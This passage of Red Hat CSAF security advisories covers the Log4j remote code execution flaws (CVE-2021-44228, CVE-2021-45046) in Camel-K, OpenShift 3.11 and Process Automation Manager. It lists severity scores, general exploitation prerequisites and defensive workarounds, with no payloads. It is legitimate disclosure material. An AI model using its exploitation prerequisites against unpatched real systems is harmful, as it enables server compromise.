"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=red.hat.integration\u0026version=2021-Q4",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions\u0026product=red.hat.integration\u0026version=2021-Q4"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_integration/2021.q4",
"url": "https://access.redhat.com/documentation/en-us/red_hat_integration/2021.q4"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5130.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Integration Camel-K 1.6.2 release and security update",
"tracking": {
"current_release_date": "2024-12-12T01:17:25+00:00",
"generator": {
"date": "2024-12-12T01:17:25+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5130",
"initial_release_date": "2021-12-14T17:55:09+00:00",
"revision_history": [
{
"date": "2021-12-14T17:55:09+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T17:55:09+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:17:25+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Integration",
"product": {
"name": "Red Hat Integration",
"product_id": "Red Hat Integration",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:integration:1"
}
}
}
],
"category": "product_family",
"name": "Red Hat Integration"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Integration"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T17:55:09+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Integration"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5130"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"Red Hat Integration"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Integration"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
}
]
}
rhsa-2021_5094
Vulnerability from csaf_redhat
Published
2021-12-14 05:50
Modified
2024-12-12 01:16
Summary
Red Hat Security Advisory: OpenShift Container Platform 3.11.z security update
Notes
Topic
Red Hat OpenShift Container Platform release 3.11.z is now available with
updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
Details
Red Hat OpenShift Container Platform is Red Hat's cloud computing
Kubernetes application platform solution designed for on-premise or private
cloud deployments.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an
attacker-controlled string value (CVE-2021-44228)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s)
listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Container Platform release 3.11.z is now available with\nupdates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an\nattacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5094",
"url": "https://access.redhat.com/errata/RHSA-2021:5094"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5094.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Container Platform 3.11.z security update",
"tracking": {
"current_release_date": "2024-12-12T01:16:54+00:00",
"generator": {
"date": "2024-12-12T01:16:54+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5094",
"initial_release_date": "2021-12-14T05:50:14+00:00",
"revision_history": [
{
"date": "2021-12-14T05:50:14+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T05:50:14+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:16:54+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 3.11",
"product": {
"name": "Red Hat OpenShift Container Platform 3.11",
"product_id": "7Server-RH7-RHOSE-3.11",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:3.11::el7"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Enterprise"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64",
"product": {
"name": "openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64",
"product_id": "openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2?arch=amd64\u0026repository_url=registry.redhat.io/openshift3/ose-logging-elasticsearch5\u0026tag=v3.11.570-2.gd119820"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64 as a component of Red Hat OpenShift Container Platform 3.11",
"product_id": "7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64"
},
"product_reference": "openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64",
"relates_to_product_reference": "7Server-RH7-RHOSE-3.11"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T05:50:14+00:00",
"details": "See the following documentation, which will be updated shortly for release\n3.11.z, for important instructions on how to upgrade your cluster and fully\napply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html\n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258 .",
"product_ids": [
"7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5094"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
},
{
"cve": "CVE-2021-45046",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-14T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2032580"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45046"
},
{
"category": "external",
"summary": "RHBZ#2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2021-44228",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T05:50:14+00:00",
"details": "See the following documentation, which will be updated shortly for release\n3.11.z, for important instructions on how to upgrade your cluster and fully\napply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html\n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258 .",
"product_ids": [
"7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5094"
},
{
"category": "workaround",
"details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).",
"product_ids": [
"7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"7Server-RH7-RHOSE-3.11:openshift3/ose-logging-elasticsearch5@sha256:88379eab3d1e07f120b5dc6fa6ba4ebf96d3afb6aaf388d279084d675b23b5c2_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-05-01T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)"
}
]
}
rhsa-2022_0082
Vulnerability from csaf_redhat
Published
2022-01-11 17:56
Modified
2024-12-12 01:19
Summary
Red Hat Security Advisory: Red Hat Process Automation Manager 7.11.1 security update
Notes
Topic
An update is now available for Red Hat Process Automation Manager.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.
This release of Red Hat Process Automation Manager 7.11.1 serves as an update to Red Hat Process Automation Manager 7.11.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Process Automation Manager.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis release of Red Hat Process Automation Manager 7.11.1 serves as an update to Red Hat Process Automation Manager 7.11.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2022:0082",
"url": "https://access.redhat.com/errata/RHSA-2022:0082"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_0082.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Process Automation Manager 7.11.1 security update",
"tracking": {
"current_release_date": "2024-12-12T01:19:23+00:00",
"generator": {
"date": "2024-12-12T01:19:23+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2022:0082",
"initial_release_date": "2022-01-11T17:56:46+00:00",
"revision_history": [
{
"date": "2022-01-11T17:56:46+00:00",
